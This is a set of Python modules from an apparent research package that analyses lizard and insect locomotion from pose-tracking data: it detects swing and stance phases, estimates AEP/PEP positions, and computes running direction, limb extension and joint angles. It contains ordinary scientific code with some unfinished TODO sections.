# fill all rows until next idx with that swing or stance number
results[row] = self.current_phase
# fill all rows after last idx with np.nan
if index != 0:
results[intersection_dict['idx'][index]:] = np.nan
# print("results: ", results)
return results
# Todo: Go through intersection_dict and assign correct swing or stance phase for every row
def assign_swing_or_stance(self, sign):
if sign > 0: # swing
if self.phase == 'stance' or self.phase == 'UNKNOWN':
self.stride_phase_counter += 1
self.phase = 'swing' # originally called stride
retval = f'swing{self.stride_phase_counter:04d}'
else: # stance
if self.phase == 'swing' or self.phase == 'UNKNOWN':
self.stance_phase_counter += 1
self.phase = 'stance'
retval = f'stance{self.stance_phase_counter:04d}'
return retval
def __str__(self):
return f"swings: {self.stride_phase_counter}, stances: {self.stance_phase_counter}"
def plot_footfall_pattern(results, data_rows_count, filename, plotting_footfall_folder):
"""
takes the result dataframe and creates a new dataframe for plotting. Every foot gets assigned an individual number.
The dataframe is then filtered for strings containing "stance", the stances get replaced by the respective number,
while all strides will be NaN.
In the plot stances are therefore displayed as bars and strides are empty.
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.patches import Patch
import os
import errno
df_plot = pd.DataFrame(columns=results.keys(), index=range(data_rows_count))
# filter here and only fill in stances as numbers => stances bars, strides white
for i, key in enumerate(results):
df_plot[key] = [i + 1 if s.startswith(b'stance') else np.NaN for s in results[key]]
key_list = [key for key in df_plot.columns]
colors = False
if colors:
cmap = plt.cm.coolwarm
legend_elements = [Line2D([0], [0], color=cmap(0.), lw=4, label=key_list[0]),
Line2D([0], [0], color=cmap(.33), lw=4, label=key_list[1]),
Line2D([0], [0], color=cmap(.66), lw=4, label=key_list[2]),
Line2D([0], [0], color=cmap(1.), lw=4, label=key_list[3]),
Line2D([0], [0], color='black', lw=4, label='stance phases'),
Line2D([0], [0], color='white', lw=4, label='stride phases')]
fig, ax = plt.subplots()
df_plot.plot(linewidth=10, color=cmap(np.linspace(0, 1, 5)), ax=ax)
ax.legend(handles=legend_elements)
else:
legend_elements = [Line2D([0], [0], color='white', lw=1, label='1 = FL | 2 = FR | 3 = HR | 4 = HL'),
Line2D([0], [0], color='black', lw=4, label='stance phases'),
Line2D([0], [0], color='white', lw=4, label='stride phases')]
fig, ax = plt.subplots()
df_plot.plot(linewidth=10, color='black', ax=ax)
ax.legend(handles=legend_elements)
# saves footfall pattern diagrams as pdf in the defined result folder. If the folder does not exist yet, it will be created
try:
os.makedirs(plotting_footfall_folder)
except OSError as e:
if e.errno != errno.EEXIST:
raise
plt.savefig(os.path.join(plotting_footfall_folder, "{}.pdf".format(filename)))
plt.clf()
plt.close()
```
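The core of the step detection above is a sign-change test: after smoothing, a switch between swing and stance is wherever the difference between the body and foot curves changes sign. A minimal, self-contained sketch of that test on synthetic data (numpy only; the curves are made up):

```python
import numpy as np

# Synthetic stand-ins for the smoothed body and foot motion curves.
frames = np.arange(200)
body = np.full(frames.shape, 5.0)              # roughly constant body motion
foot = 5.0 + 10.0 * np.sin(frames / 10.0)      # foot oscillates around the body curve

# Same pattern as smooth_and_plot(): indices where sign(body - foot) flips.
idx = np.argwhere(np.diff(np.sign(body - foot))).flatten()
signs = np.sign(body - foot)[idx]

# determine_stride_phases() then labels the frames following each index as
# swing (positive sign) or stance (negative sign).
print(list(zip(idx.tolist(), signs.tolist())))
```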
#### File: lizardanalysis/calculations/aep_pep_test.py
```python
def aep_pep_test(**kwargs):
"""
Calculates two different things:
1.) The x and y coordinates of the AEP and PEP, relative to the coxa of a respective leg
2.) The swing phases and the stance phases, identifying on a frame by frame basis
Return: results data frame with 30 key value pairs:
x6 allocation of swing and stance phases for each foot/leg
x6 x coordinates of AEP for each foot/leg
x6 y coordinates for AEP for each foot/leg
x6 x coordinates for PEP for each foot/leg
x6 y coordinates for PEP for each foot/leg
"""
import os.path
import pandas as pd
import numpy as np
from pathlib import Path
from lizardanalysis.utils import animal_settings
from scipy import signal
import math
# print("footfall_by_switches")
# define necessary **kwargs:
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
config = kwargs.get('config')
filename = kwargs.get('filename')
likelihood = kwargs.get('likelihood')
animal = kwargs.get('animal')
df_result_current = kwargs.get('df_result_current')
# added in this so that you can get the estimated values from alpha
# so long as that column currently resides in the data frame
config_file = Path(config).resolve()
# result folder for footfall plots
step_detection_folder = os.path.join(str(config_file).rsplit(os.path.sep, 1)[0], "analysis-results",
"step_detection")
# create file path for foot fall pattern diagrams
plotting_footfall_folder = os.path.join(step_detection_folder, "footfall-pattern-diagrams")
# TODO: instead of hard-coding the feet and the three points for body_motion,
# TODO: let the user choose based on labels available in DLC result file: Choose feet & choose body motion
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
relative = False
plotting_footfall_patterns = True
# define cut-off value -> crops X% of frames on each side of video
p_cut_off = 0.05
body_motion = {"frame": [], "mean_motion_x": []}
abdomen_diff = 0
head_diff = 0
# assuming that the body from the head to the abdomen is rigid?
# this for loop is used to calculate the x coordinate difference between a given frame and the previous
# therefore gives you can indicator of the direction of motion
# if the [row] - [row-1] > 0 , then the stick insect is moving to the right
# if the [row] - [row-1] < 0, then the stick insect is moving to the left
for row in range(1, data_rows_count):
if data.loc[row][scorer, "head", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, "head", 'likelihood'] >= likelihood:
head_diff = data.loc[row][scorer, "head"] - data.loc[row - 1][scorer, "head"]
if data.loc[row][scorer, "abdomen", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, "abdomen", 'likelihood'] >= likelihood:
abdomen_dif = data.loc[row][scorer, "abdomen"] - data.loc[row - 1][scorer, "abdomen"]
body_motion["frame"].append(row - 1)
body_motion["mean_motion_x"].append(abs((head_diff + abdomen_diff) / 2.0))
# taking the absolute value, because if the stick insect walks to the left you don't want to
# switch which sign change indicates swing/PEP and which indicates stance/AEP.
# taking the average of the differences, to determine the average 'speed' i.e. the displacement over one frame of the whole body
# one class instance and one result array for every foot, since every foot needs its own counter
calculators = {}
results = {}
# for every foot, need to do within the original for loop, so all foot calculations are performed for a given frame
foot_motions = {}
rel_foot_motions = {}
# left the for loop for the body motion, and will now be working with for loops for the foot motion
for foot in feet:
foot_motions[f"{foot}"] = []
rel_foot_motions[f"rel_{foot}"] = []
# if the [row] - [row-1] > 0 , then the stick insect FOOT is moving to the right
# if the [row] - [row-1] < 0, then the stick insect FOOT is moving to the left
# taking an absolute value for the body and foot motions avoids issues with directions (?)
foot_motion = 0
for row in range(1, data_rows_count):
if data.loc[row][scorer, f"{foot}", 'likelihood'] >= likelihood and data.loc[row - 1][scorer,
f"{foot}",'likelihood'] >= likelihood:
foot_motion = abs(data.loc[row][scorer, f"{foot}", 'x'] - data.loc[row - 1][
scorer, f"{foot}", 'x'])
foot_motions[f"{foot}"].append(foot_motion)
rel_foot_motions[f"rel_{foot}"].append(foot_motion - body_motion['mean_motion_x'][row - 1])
else:
# likelihood too low: re-use the last foot_motion value so the lists stay aligned
foot_motions[f"{foot}"].append(foot_motion)
rel_foot_motions[f"rel_{foot}"].append(foot_motion - body_motion['mean_motion_x'][row - 1])
# now need to store the body motion data, the foot motion data, and the relative foot motion all in a dataframe
# this dataframe within the loop is only for one foot
dict_df = {'body_motion': body_motion['mean_motion_x'], 'foot_motion': foot_motions[f"{foot}"],
"rel_foot_motion": rel_foot_motions[f"rel_{foot}"]}
print(dict_df)
df = pd.DataFrame.from_dict(dict_df)
intersections = smooth_and_plot(df, data_rows_count, p_cut_off, relative, foot, filename,
step_detection_folder)
######################################################################################################################
# the smooth_and_plot function returns 'intersection_dict'
# intersection dict is: {"idx":[], "sign":[]}
# idx = the idx of the number list/array of differences in the sign, only storing when the differences are non-zero
# sign = stores the sign of the number associated with the index of the non zero number
# positive => start of swing =>PEP
# negative => start of stance => AEP
# gives the alpha_estimation values for the
rom_list = [col for col in df_result_current.columns if ("rom_angle_{}".format(foot) in col)]
aep_pep_angle = []
# for loop will calculate the angle that defines the femur-coxa vector relative to the normal
# to the body axis, running through the coxa of the foot of interest
for angle in range(len(rom_list)):
aep_pep_angle.append(90 - angle)
foot_chars = list(foot)
f_t_joint_lpx = []
f_t_joint_lpy = []
t_c_joint_lpx = []
t_c_joint_lpy = []
# low pass filter application of the coordinate data alone?
# is this necessary
b, a = signal.butter(3, 0.1, btype='lowpass', analog=False)
f_t_joint_lpx = signal.filtfilt(b, a,
(data.loc[:, (scorer, "{}m{}".format(foot_chars[0], foot_chars[1]), "x")]))
f_t_joint_lpy = signal.filtfilt(b, a,
(data.loc[:, (scorer, "{}m{}".format(foot_chars[0], foot_chars[1]), "y")]))
t_c_joint_lpx = signal.filtfilt(b, a,
(data.loc[:, (scorer, "{}b{}".format(foot_chars[0], foot_chars[1]), "x")]))
t_c_joint_lpy = signal.filtfilt(b, a,
(data.loc[:, (scorer, "{}b{}".format(foot_chars[0], foot_chars[1]), "y")]))
# ensuring that the values for the keys are defined as arrays, so that you can append for the
# following for loop
results_aep = {"{}_x".format(foot): [], "{}_y".format(foot): []}
results_pep = {"{}_x".format(foot): [], "{}_y".format(foot): []}
for i in range(2, data_rows_count):
if i - 2 in intersections["idx"]:
# atm just leaving the likelihood check
# is it worth doing, considering the alpha angles depended on those likelihoods anyway?
# so you would be just checking the same likelihood even though
# now calculating the Euclidean distance between the coxa label and the femur label
f_t_joint_co = (f_t_joint_lpx[i], f_t_joint_lpy[i])
t_c_joint_co = (t_c_joint_lpx[i], t_c_joint_lpy[i])
distance = np.sqrt(
(f_t_joint_co[0] - t_c_joint_co[0]) ** 2 + (f_t_joint_co[1] - t_c_joint_co[1]) ** 2)
# calibrate distance with conversion factor
# NEED TO WRITE THE CONVERSION FACTOR!
distance_calib = distance # / conv_fac
# results_aep = {}
# results_pep = {}
if intersections["sign"][i - 2] > 0:
# this means you are transitioning to the swing phase, so should be PEP
results_pep[f"{foot}_x"].append((math.cos(aep_pep_angle[i]) * distance_calib))
results_pep[f"{foot}_y"].append((math.sin(aep_pep_angle[i]) * distance_calib))
if intersections["sign"][i - 2] < 0:
# this means you are transitioning to the stance phase so should be aep
results_aep[f"{foot}_x"].append((math.cos(aep_pep_angle[i]) * distance_calib))
results_aep[f"{foot}_y"].append((math.sin(aep_pep_angle[i]) * distance_calib))
# therefore should now have two dictionaries that contain the x coordinates and the y coordinates
# of the aep and the pep for each foot
# one aep value and one pep value per stepping cycle
#####################################################################################################################
# initializes class instance for every foot and empty result dict to be filled with the swing and stance phases:
calculators[foot] = StridesAndStances()
# "S10" = string of 10 characters: stance/stride + counter 000n
results[foot] = calculators[foot].determine_stride_phases(intersections, data_rows_count)
# rename dictionary keys of results
results = {'stepphase_' + key: value for (key, value) in results.items()}
results_aep = {"AEP_" + key: value for (key, value) in results_aep.items()}
results_pep = {"PEP_" + key: value for (key, value) in results_pep.items()}
# print("results: ", results)
if plotting_footfall_patterns:
""" plots a foot fall pattern diagram for every DLC result csv file/every lizard run """
plot_footfall_pattern(results, data_rows_count, filename, plotting_footfall_folder)
## need to add the result of the code here!
# last step must be combining the three results dictionaries
results.update(results_aep)
results.update(results_pep)
return results
# shouldn't matter whether the stick insect walks in a straight horizontal line or not, because you're only looking at
# the switch in the direction of movement
# therefore, as long as the insect doesn't walk completely vertically suddenly, then the algorithm should still work
def smooth_and_plot(df, data_rows_count, p_cut_off, relative, foot, filename, step_detection_folder, plotting=True):
# smoothing of the raw input data from foot motion and body motion, using the Butterworth low-pass filter and a Savitzky-
# Golay smoothing algorithm. Then, the intersection points are computed between the smoothed body and foot curves
# If relative is TRUE: body motion is already subtracted from the foot motion, hence foot is relative to the x-axis
# If relative is FALSE: the intersection of the foot motion and body motion data curves needs to be determined
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal
import os
import errno
# savgol filter smoothing window (must be odd!)
smooth_wind = 13
x_cut_off_value = int(round(data_rows_count * p_cut_off, 0))
x = np.linspace(0, data_rows_count - 1, data_rows_count - 1)
b, a = signal.butter(3, 0.1, btype='lowpass', analog=False)
x_cut_off = np.linspace(x_cut_off_value, data_rows_count - 1, int(data_rows_count - 1 - x_cut_off_value))
if plotting == True:
# initiate plot
plt.figure()
plt.axvline(x_cut_off_value, color='black', label='cutoff 0.05%')
if relative == True:
"""Uses the relative foot motion i.e. the foot motion where body motion has been subtracted"""
rel_foot_motion_low_passed = signal.filtfilt(b, a, df['rel_foot_motion'])
# smooth curves with Savitzky-Golay filter:
y_foot_rel = df.loc[x_cut_off_value:, 'rel_foot_motion']
y_foot_rel_lp = rel_foot_motion_low_passed[x_cut_off_value:] # two different types of filtering (?)
# smooth without the low pass filter
y_foot_rel_smoothed = signal.savgol_filter(y_foot_rel, smooth_wind, 3)
# smooth with the low pass filter
y_foot_rel_lp_smoothed = signal.savgol_filter(y_foot_rel_lp, smooth_wind, 3)
x_axis_f = np.zeros(data_rows_count - 1 - x_cut_off_value)
# get the indexes of the frames where you are transitioning from swing -> stance or stance -> swing
idx = np.argwhere(np.diff(np.sign(x_axis_f - y_foot_rel_smoothed))).flatten()
intersections_dict = {"idx": [], "sign": []}
for i in idx:
intersections_dict["idx"].append(i)
intersections_dict["sign"].append(np.sign(x_axis_f[i] - y_foot_rel_smoothed[i]))
intersections_dict["idx"] = [b + x_cut_off_value for b in intersections_dict['idx']]
if plotting == True:
df['rel_foot_motion'].plot(color='#f5c242') # plot_rel_foot
plt.plot(x, rel_foot_motion_low_passed, color='green', label='rel_foot_motion low pass (lp) filter')
plt.plot(x_cut_off, y_foot_rel_smoothed, color='red', label='rel_foot_motion_smoothed')
plt.plot(x_cut_off, y_foot_rel_lp_smoothed, color='lightgreen', label='rel_foot_motion_lp_smoothed')
plt.plot(x_cut_off[idx], y_foot_rel_lp_smoothed[idx], 'ko') # plot intersection points
# edit here -> second argument was changed from x_axis_f to y_foot_rel_lp_smoothed
for i in range(len(intersections_dict['idx'])):
plt.annotate(intersections_dict['idx'][i],
(x_cut_off[intersections_dict['idx'][i] - x_cut_off_value] - 5,
y_foot_rel_lp_smoothed[intersections_dict['idx'][i] - x_cut_off_value] + 3))
# another edit here?
else:
"""
Uses the foot motion and the body motion and computes the intersection points for the smoothed curves.
Intersection points for the lizard standing (bodymotion -> 0) will get excluded by using a body-motion threshold
of 10% of max(body_motion_lp_smoothed).
"""
# lowpass filter for body motion
body_motion_low_passed = signal.filtfilt(b, a, df['body_motion'])
# lowpass filter for foot motion
foot_motion_low_passed = signal.filtfilt(b, a, df['foot_motion'])
# smooth curves:
y_body = df.loc[x_cut_off_value:, 'body_motion']
y_body_lp = body_motion_low_passed[x_cut_off_value:]
y_foot = df.loc[x_cut_off_value:, 'foot_motion']
y_foot_lp = foot_motion_low_passed[x_cut_off_value:]
# smooth original body motion without low pass filter
y_body_smoothed = signal.savgol_filter(y_body, 51, 3)
# smooth low-pass-filtered body motion
y_body_lp_smoothed = signal.savgol_filter(y_body_lp, 17, 3)
# smooth original foot motion without low pass filter
y_foot_smoothed = signal.savgol_filter(y_foot, 17, 3)
# smooth low-pass-filtered rel foot motion
y_foot_lp_smoothed = signal.savgol_filter(y_foot_lp, 17, 3)
# compute and plot intersection points:
idx = np.argwhere(np.diff(np.sign(y_body_lp_smoothed - y_foot_lp_smoothed))).flatten()
intersections_dict = {"idx": [], "sign": []}
max_body_motion = max([abs(max(y_body_lp_smoothed)), abs(min(y_body_lp_smoothed))])
body_motion_stand = round(max_body_motion * 0.1, 2)
# print(f"max body motion: {max_body_motion}, 10%: {body_motion_stand}")
for i in idx:
# exclude all intersections which are within 0 +- 10% of max body motion (~standing)
if abs(y_body_lp_smoothed[i]) >= body_motion_stand:
intersections_dict["idx"].append(i)
intersections_dict["sign"].append(np.sign(y_body_lp_smoothed[i] - y_foot_lp_smoothed[i]))
intersections_dict['idx'] = [b + x_cut_off_value for b in intersections_dict['idx']]
# print("x intersections: ", intersections_dict)
# remove intersection points when lizard has stopped walking (usually in the end):
# intersections_dict = remove_standing_intersections(intersections_dict, y_body_lp_smoothed, y_foot_lp_smoothed)
if plotting == True:
df['body_motion'].plot(color='#3089db') # plot body motion
df['foot_motion'].plot(color='#d68f00') # plot foot motion
plt.plot(x, body_motion_low_passed, color='lightblue', label='body_motion low pass (lp) filter')
plt.plot(x, foot_motion_low_passed, color='green', label='foot_motion low pass (lp) filter')
plt.plot(x_cut_off, y_body_smoothed, color='#160578', label='body_motion_smoothed')
plt.plot(x_cut_off, y_foot_smoothed, color='red', label='foot_motion_smoothed')
plt.plot(x_cut_off, y_body_lp_smoothed, color='#9934b3', label='body_motion_lp_smoothed')
plt.plot(x_cut_off, y_foot_lp_smoothed, color='lightgreen', label='foot_motion_lp_smoothed')
plt.plot(x_cut_off[idx], y_body_lp_smoothed[idx], 'ko') # plot intersection points
for i in range(len(intersections_dict['idx'])):
plt.annotate(intersections_dict['idx'][i],
(x_cut_off[intersections_dict['idx'][i] - x_cut_off_value] - 5,
y_body_lp_smoothed[intersections_dict['idx'][i] - x_cut_off_value] + 3))
if plotting == True:
# set y-limits, add legend and display plots
plt.axhline(0, color='black')
plt.ylim(-30, 30)
plt.legend()
plt.xlabel('frames')
plt.ylabel('dx/frame')
filename_title = filename.split("_", 2)[:2]
filename_title = filename_title[0] + filename_title[1]
plt.title(f"{filename_title}-{foot}")
# plt.show()
try:
os.makedirs(step_detection_folder)
# print("folder for curve_fitting plots created")
except OSError as e:
if e.errno != errno.EEXIST:
raise
if relative == True:
plt.savefig(os.path.join(step_detection_folder, f"steps_{filename_title}_{foot}_rel.pdf"))
else:
plt.savefig(os.path.join(step_detection_folder, f"steps_{filename_title}_{foot}.pdf"))
# plt.show()
plt.close()
return intersections_dict
## removed the unused function, might need to put back in at some point
class StridesAndStances:
"""
class to detect stride and stance phases for current feet => initialize class instance for every foot.
This method iterates through all frames, if the current frame is one of the intersection points, the sign of the
point will be checked. If the sign is positive the phase will be set to swing and the swing_phase_counter increased
by 1. All frames until the next intersection will be assigned that phase name and number.
Rows before and after first and last index respectively will be filled with np.nan.
"""
def __init__(self):
import numpy as np
self.stride_phase_counter = 0
self.stance_phase_counter = 0
self.phase = 'UNKNOWN'
self.current_phase = np.nan
def determine_stride_phases(self, intersection_dict, data_rows_count):
"""
Function to detect the swing or stance phases using the intersection points and their signs.
Return: list with one entry for every row.
"""
import numpy as np
# create empty list with length of data rows count:
results = np.full((data_rows_count,), '', dtype='S10')
index = 0
for row in range(data_rows_count):
# switch swing or stance depending on sign of intersection point
if row in intersection_dict['idx']:
index = intersection_dict['idx'].index(row) # find the index in list of current idx
sign = intersection_dict['sign'][index] # find the respective sign
# if sign is positive, the phase till next idx will be swing
self.current_phase = self.assign_swing_or_stance(sign)
# fill all rows until next idx with that swing or stance number
results[row] = self.current_phase
# fill all rows after last idx with np.nan
if index != 0:
results[intersection_dict['idx'][index]:] = np.nan
# print("results: ", results)
return results
# Todo: Go through intersection_dict and assign correct swing or stance phase for every row
def assign_swing_or_stance(self, sign):
if sign > 0: # swing
if self.phase == 'stance' or self.phase == 'UNKNOWN':
self.stride_phase_counter += 1
self.phase = 'swing' # originally called stride
retval = f'swing{self.stride_phase_counter:04d}'
else: # stance
if self.phase == 'swing' or self.phase == 'UNKNOWN':
self.stance_phase_counter += 1
self.phase = 'stance'
retval = f'stance{self.stance_phase_counter:04d}'
return retval
def __str__(self):
return f"swings: {self.stride_phase_counter}, stances: {self.stance_phase_counter}"
def plot_footfall_pattern(results, data_rows_count, filename, plotting_footfall_folder):
"""
takes the result dataframe and creates a new dataframe for plotting. Every foot gets assigned an individual number.
The dataframe is then filtered for strings containing "stance", the stances get replaced by the respective number,
while all strides will be NaN.
In the plot stances are therefore displayed as bars and strides are empty.
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.patches import Patch
import os
import errno
df_plot = pd.DataFrame(columns=results.keys(), index=range(data_rows_count))
# filter here and only fill in stances as numbers => stances bars, strides white
for i, key in enumerate(results):
df_plot[key] = [i + 1 if s.startswith(b'stance') else np.NaN for s in results[key]]
key_list = [key for key in df_plot.columns]
colors = False
if colors:
cmap = plt.cm.coolwarm
legend_elements = [Line2D([0], [0], color=cmap(0.), lw=4, label=key_list[0]),
Line2D([0], [0], color=cmap(.33), lw=4, label=key_list[1]),
Line2D([0], [0], color=cmap(.66), lw=4, label=key_list[2]),
Line2D([0], [0], color=cmap(1.), lw=4, label=key_list[3]),
Line2D([0], [0], color='black', lw=4, label='stance phases'),
Line2D([0], [0], color='white', lw=4, label='stride phases')]
fig, ax = plt.subplots()
df_plot.plot(linewidth=10, color=cmap(np.linspace(0, 1, 5)), ax=ax)
ax.legend(handles=legend_elements)
else:
legend_elements = [Line2D([0], [0], color='white', lw=1, label='1 = FL | 2 = FR | 3 = HR | 4 = HL'),
Line2D([0], [0], color='black', lw=4, label='stance phases'),
Line2D([0], [0], color='white', lw=4, label='stride phases')]
fig, ax = plt.subplots()
df_plot.plot(linewidth=10, color='black', ax=ax)
ax.legend(handles=legend_elements)
# saves footfall pattern diagrams as pdf in the defined result folder. If the folder does not exist yet, it will be created
try:
os.makedirs(plotting_footfall_folder)
except OSError as e:
if e.errno != errno.EEXIST:
raise
plt.savefig(os.path.join(plotting_footfall_folder, "{}.pdf".format(filename)))
plt.clf()
plt.close()
```
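The AEP/PEP coordinates above are computed as cos(angle)·distance and sin(angle)·distance relative to the coxa, i.e. a polar-to-Cartesian conversion. A small standalone sketch of that step with made-up values; note that Python's `math.cos`/`math.sin` expect radians, so the angle in degrees is converted explicitly here:

```python
import math

def polar_to_xy(angle_deg, distance_px):
    """Turn an angle (degrees, relative to the body-axis normal) and a
    coxa-femur distance (px) into x/y coordinates relative to the coxa."""
    angle_rad = math.radians(angle_deg)
    return math.cos(angle_rad) * distance_px, math.sin(angle_rad) * distance_px

# Example with made-up values: an extreme position 35 degrees from the normal,
# 42 px away from the coxa.
x, y = polar_to_xy(35.0, 42.0)
print(round(x, 2), round(y, 2))
```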
#### File: lizardanalysis/calculations/direction_of_running.py
```python
import pandas as pd
import numpy as np
from numpy import array
import math
def direction_of_running(**kwargs):
"""
Uses the Head tracking point to determine the direction of climbing.
Depending on the clicked value, which determines the configuration of the lizard climbing direction in the videos:
- RIGHT: = increasing x
- LEFT: = decreasing x
:param data: pandas DataFrame with the current DLC results read in from csv
:return direction of running as string "RIGHT" or "LEFT"
"""
data = kwargs.get("data")
data_row_count = kwargs.get("data_rows_count")
scorer = data.columns[1][0]
#print('scorer: ', scorer)
#TODO: filter columns of used labels for likelihood BEFORE calculation
likelihood = 0.90
#nose_coords = data[scorer, 'Nose']
#nose_coords = nose_coords[nose_coords.likelihood >= 0.90]
head_coords = data[scorer, 'Head', 'x']
#print(nose_coords.head())
if head_coords.iloc[-1] > head_coords.iloc[0]:
direction = "RIGHT"
elif head_coords.iloc[-1] < head_coords.iloc[0]:
direction = "LEFT"
else:
direction = "Direction can't be determined"
direction_list = np.array(data_row_count*[direction], dtype=np.string_)
direction_list = [direction_encode_and_strip(direction) for direction in direction_list]
return {__name__.rsplit('.', 1)[1]: direction_list}
def direction_encode_and_strip(bytestring):
# get rid of b"..." for direction
if bytestring == b'RIGHT':
direction = "RIGHT"
elif bytestring == b'LEFT':
direction = "LEFT"
else:
print("no known direction found")
direction = "UNKNOWN"
return direction
```
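The direction test above only compares the head's first and last x-coordinate. A tiny sketch of that rule on a made-up coordinate series:

```python
import pandas as pd

# Made-up head x-coordinates for one run.
head_x = pd.Series([102.0, 110.5, 131.2, 180.7, 240.3])

# Same rule as direction_of_running(): last x vs. first x.
if head_x.iloc[-1] > head_x.iloc[0]:
    print("RIGHT")
elif head_x.iloc[-1] < head_x.iloc[0]:
    print("LEFT")
else:
    print("Direction can't be determined")
```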
#### File: lizardanalysis/calculations/extension_or_flexion_phase.py
```python
def extension_or_flexion_phase(**kwargs):
import numpy as np
from lizardanalysis.utils import auxiliaryfunctions
from lizardanalysis.utils import animal_settings
# get kwargs:
df_result_current = kwargs.get('df_result_current')
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
filename = kwargs.get("filename")
animal = kwargs.get("animal")
likelihood = kwargs.get("likelihood")
feet = animal_settings.get_list_of_feet(animal)
scorer = data.columns[1][0]
### CALCULATION:
results = {}
for foot in feet:
results[foot] = np.full((data_rows_count,), 0.0, dtype='float')
# read in rows with 'ext-flex-dist_{foot}':
ext_flex_columns_list = [col for col in df_result_current.columns if ('ext-flex-dist_' in col)]
#print("ext_flex_columns_list ", ext_flex_columns_list)
# read the columns one by one and calculate the subsequent diff in distances:
for col, foot in zip(ext_flex_columns_list, feet):
# test if foot is in column name:
if foot in col:
current_col = df_result_current[col]
# calculate the distance between subsequent frames:
diff_col = current_col.diff()
# replace positive differences with 'ext' and negative with 'flex'
# flex = dist between base and tip becomes smaller = df.diff() -> row - (row-1) = negative diff
diff_col[diff_col > 0.0] = int(1)
diff_col[diff_col <= 0.0] = int(0)
diff_col[diff_col == 1] = 'ext'
diff_col[diff_col == 0] = 'flex'
#print("diff_col new ", diff_col)
# write the phase list for this foot into the results dict
results[foot] = diff_col
else:
print("foot does not match with current column name!")
break
results = {'ext-flex-phase_' + key: value for (key, value) in results.items()}
return results
```
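The extension/flexion labelling reduces to the sign of the frame-to-frame difference of the base-to-tip distance. A minimal sketch with made-up distances (the first frame has no predecessor, mirroring the NaN produced by `.diff()`):

```python
import pandas as pd

# Made-up base-to-tip distances for one foot over six frames.
dist = pd.Series([10.0, 11.2, 12.5, 12.1, 11.0, 11.8])

# Growing distance -> extension ('ext'); shrinking or constant -> flexion ('flex').
phase = dist.diff().apply(lambda d: 'ext' if d > 0 else 'flex')
phase.iloc[0] = None  # no predecessor for the first frame
print(phase.tolist())
```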
#### File: lizardanalysis/calculations/hip_and_shoulder_angles.py
```python
def hip_and_shoulder_angles(**kwargs):
"""
calculates the shoulder and hip angles for every frame.
Shoulder angle: angle between shoulder vector (FORE: Shoulder<->Shoulder_foot or HIND: Hip<->Shoulder_foot)
and limb vector (Shoulder_foot<->foot_knee)
:param kwargs: different parameters needed for calculation
:return: results dataframe with 4 key value pairs (list of frame-wise angles for every foot)
"""
import numpy as np
from lizardanalysis.utils import auxiliaryfunctions
from lizardanalysis.utils import animal_settings
#print('HIP AND SHOULDER ANGLE CALCULATION')
# define necessary **kwargs:
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
likelihood = kwargs.get('likelihood')
filename = kwargs.get('filename')
animal = kwargs.get('animal')
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
results = {}
for foot in feet:
results[foot] = np.full((data_rows_count,), np.NAN)
for i in range(data_rows_count):
# test for likelihoods:
shoulder_likelihood = data.loc[i][scorer, "Shoulder", "likelihood"]
shoulder_foot_likelihood = data.loc[i][scorer, "Shoulder_{}".format(foot), "likelihood"]
knee_foot_likelihood = data.loc[i][scorer, "{}_knee".format(foot), "likelihood"]
hip_likelihood = data.loc[i][scorer, "Hip", "likelihood"]
# get shoulder vector (shoulder - shoulder_foot or hip - shoulder_foot)
if foot == "FR" or foot == "FL":
# only calculate if likelihoods of involved tracking points are good enough else nan
if shoulder_likelihood >= likelihood and shoulder_foot_likelihood >= likelihood:
shoulder_vector = ((data.loc[i, (scorer, "Shoulder", "x")]
- data.loc[i, (scorer, "Shoulder_{}".format(foot), "x")]),
(data.loc[i, (scorer, "Shoulder", "y")]
- data.loc[i, (scorer, "Shoulder_{}".format(foot), "y")]))
#print("shoulder vector: ", shoulder_vector)
else:
shoulder_vector = (np.nan, np.nan)
else: # use HIP
# only calculate if likelihoods of involved tracking points are good enough else nan
if hip_likelihood >= likelihood and shoulder_foot_likelihood >= likelihood:
shoulder_vector = ((data.loc[i, (scorer, "Hip", "x")]
- data.loc[i, (scorer, "Shoulder_{}".format(foot), "x")]),
(data.loc[i, (scorer, "Hip", "y")]
- data.loc[i, (scorer, "Shoulder_{}".format(foot), "y")]))
#print("hip vector: ", shoulder_vector)
else:
shoulder_vector = (np.nan, np.nan)
# get limb vector (shoulder_foot - foot_knee)
if shoulder_foot_likelihood >= likelihood and knee_foot_likelihood >= likelihood:
limb_vector = ((data.loc[i, (scorer, "Shoulder_{}".format(foot), "x")]
- data.loc[i, (scorer, "{}_knee".format(foot), "x")]),
(data.loc[i, (scorer, "Shoulder_{}".format(foot), "y")]
- data.loc[i, (scorer, "{}_knee".format(foot), "y")]))
#print("limb vector: ", limb_vector)
else:
limb_vector = (np.nan, np.nan)
#print("shoulder vector, limb vector: ", shoulder_vector, limb_vector)
# calculate the shoulder/hip angle
shoulder_angle = auxiliaryfunctions.py_angle_betw_2vectors(shoulder_vector, limb_vector)
#print("shoulder angle: ", shoulder_angle)
results[foot][i] = 180.0 - shoulder_angle
# rename dictionary keys of results
results = {'shoulder_angle_' + key: value for (key, value) in results.items()}
return results
```
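The shoulder/hip angle comes from `auxiliaryfunctions.py_angle_betw_2vectors`, whose implementation is not shown in this file. A plain numpy sketch of an angle-between-two-2D-vectors computation (an assumption about what that helper does, not a copy of it):

```python
import numpy as np

def angle_between(v1, v2):
    """Angle in degrees between two 2D vectors, via the normalized dot product."""
    v1, v2 = np.asarray(v1, dtype=float), np.asarray(v2, dtype=float)
    cos_angle = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
    return np.degrees(np.arccos(np.clip(cos_angle, -1.0, 1.0)))

# Example with made-up shoulder and limb vectors:
print(round(angle_between((1.0, 0.0), (1.0, 1.0)), 1))  # 45.0
```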
#### File: lizardanalysis/calculations/lizards_feet_width_and_height.py
```python
def lizards_feet_width_and_height(**kwargs):
"""
calculates the vertical and horizontal distance between the FR and HL foot during mid-stance.
The distances are calculated along the x and y axis of the video, hence if the lizard climbs at an angle the
